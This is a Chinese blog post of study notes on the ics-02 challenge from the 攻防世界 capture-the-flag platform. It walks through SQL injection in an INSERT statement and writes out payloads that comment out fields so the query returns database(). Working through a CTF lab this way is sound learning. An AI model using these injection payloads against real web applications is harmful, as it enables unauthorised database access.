攻防世界 ics-02 writeup 学习

牧云@^-^@ 提交于 2020-04-07 09:56:02

攻防世界 ics-02 writeup 学习

emmm因为ssrf是对.pdf文件的下载,访问页面不出来的原因,有很大的烦躁,学习了一下writeup。小白一个,那就对注入Poc学习一下吧。

本地sql测试

因为是插入数据的注入,拿了一个表测试,很蠢的照着poc试了一下,非常蠢..

 

 l_name 显示为0....因为poc中的+是python 字符串的连接字符 直接加括号就好了

 

 那么再试试错位到回显位置注入

 

 实战注入测试

1.给txtfirst_name添加单引号 报错'm','y','Esq.','01/10/2019','9786571')'  存在注入

2.猜测sql语句  Inset into XXX values(XX,XX,XX,XX)
3.猜测
insert in to xxx values('1',(database()),/*,'m'*/,'y','Esq.','01/10/2019','9786571')'

注入sql语句为

1',(database()),/*,'m'*/,'

 

4.由于忘了看回显位置为<p><b>Name: </b>,'y, 1<br />所以调整sql,由txtLast_name来回显
 
5.newpoc
insert in to xxx values('1','m',(database()),/*,'m','y'*/,'Esq.','01/10/2019','9786571')'

 

    注入sql语句为
1','m',(database()),/*,'m','y'*/,'

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!